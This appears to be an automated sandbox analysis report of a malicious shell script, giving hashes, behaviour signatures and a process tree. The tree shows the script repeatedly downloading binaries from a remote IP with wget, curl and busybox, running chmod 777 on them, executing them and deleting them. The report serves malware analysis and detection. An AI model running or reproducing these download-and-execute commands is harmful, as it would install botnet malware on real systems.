Analysis
-
max time kernel
102s -
max time network
131s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
24/11/2024, 02:02
Static task
static1
Behavioral task
behavioral1
Sample
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh
-
Size
10KB
-
MD5
90e40b4503b0424a058f69437e1026ff
-
SHA1
035df066045d7bc2ab807fc923f25cf1a0f3e70e
-
SHA256
0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474
-
SHA512
adfa914962ae7273bfd9238ce16c5b177765452a64ba873335cc42fdab6cf5cf072fb12803403aa10b44c957efbc5e2a76de724c912bde8c573afee70a1a1795
-
SSDEEP
192:8zddR70qV5mSi1dGxvSgM3omSi1de72gdR70qVa:8zddR70kHxvSgM3S72gdR70ka
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh/tmp/0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh1⤵PID:712
-
/bin/rm/bin/rm bins.sh2⤵PID:717
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:724
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:736
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:743
-
-
/bin/chmodchmod 777 j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH./j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- Executes dropped EXE
PID:746
-
-
/bin/rmrm j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:747
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:748
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:749
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:750
-
-
/bin/chmodchmod 777 9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4./9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- Executes dropped EXE
PID:752
-
-
/bin/rmrm 9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:753
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:754
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:755
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:805
-
-
/bin/chmodchmod 777 Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ./Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- Executes dropped EXE
PID:807
-
-
/bin/rmrm Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:808
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:809
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:810
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:811
-
-
/bin/chmodchmod 777 bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd./bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:814
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:815
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:826
-
-
/bin/chmodchmod 777 glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- File and Directory Permissions Modification
PID:846
-
-
/tmp/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ./glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- Executes dropped EXE
PID:847
-
-
/bin/rmrm glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:850
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:851
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:852
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:853
-
-
/bin/chmodchmod 777 qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- File and Directory Permissions Modification
PID:854
-
-
/tmp/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p./qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- Executes dropped EXE
PID:855
-
-
/bin/rmrm qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:856
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:857
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:858
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:859
-
-
/bin/chmodchmod 777 9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS./9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm 9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:862
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:863
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:865
-
-
/bin/chmodchmod 777 eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj./eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:868
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:869
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:871
-
-
/bin/chmodchmod 777 vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr./vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:874
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:875
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:877
-
-
/bin/chmodchmod 777 1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ./1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm 1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:880
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:881
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:883
-
-
/bin/chmodchmod 777 uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc./uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:886
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:887
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:889
-
-
/bin/chmodchmod 777 mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9./mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:892
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:893
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:895
-
-
/bin/chmodchmod 777 0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7./0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm 0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:898
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:899
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:901
-
-
/bin/chmodchmod 777 NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo./NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:904
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:905
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:907
-
-
/bin/chmodchmod 777 1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ./1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm 1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ2⤵PID:910
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:911
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:913
-
-
/bin/chmodchmod 777 uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc./uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc2⤵PID:916
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:917
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:919
-
-
/bin/chmodchmod 777 9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS./9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm 9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS2⤵PID:922
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:923
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:925
-
-
/bin/chmodchmod 777 eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj./eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj2⤵PID:928
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:929
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:931
-
-
/bin/chmodchmod 777 vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr./vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr2⤵PID:934
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:935
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:937
-
-
/bin/chmodchmod 777 mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9./mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm mWwCaRsytB63gfA94vvOgnOFNzJkghO4k92⤵PID:940
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:941
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:943
-
-
/bin/chmodchmod 777 0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7./0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm 0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD72⤵PID:946
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:947
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:949
-
-
/bin/chmodchmod 777 NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo./NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:952
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:953
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:955
-
-
/bin/chmodchmod 777 j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH./j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:958
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:959
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:960
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:961
-
-
/bin/chmodchmod 777 9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4./9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm 9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:964
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:965
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:967
-
-
/bin/chmodchmod 777 Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ./Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:970
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:971
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:973
-
-
/bin/chmodchmod 777 bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd./bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:976
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:977
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:978
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:979
-
-
/bin/chmodchmod 777 glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- File and Directory Permissions Modification
PID:980
-
-
/tmp/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ./glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- Executes dropped EXE
PID:981
-
-
/bin/rmrm glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:982
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:983
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:984
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:985
-
-
/bin/chmodchmod 777 qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- File and Directory Permissions Modification
PID:986
-
-
/tmp/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p./qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- Executes dropped EXE
PID:987
-
-
/bin/rmrm qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:988
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97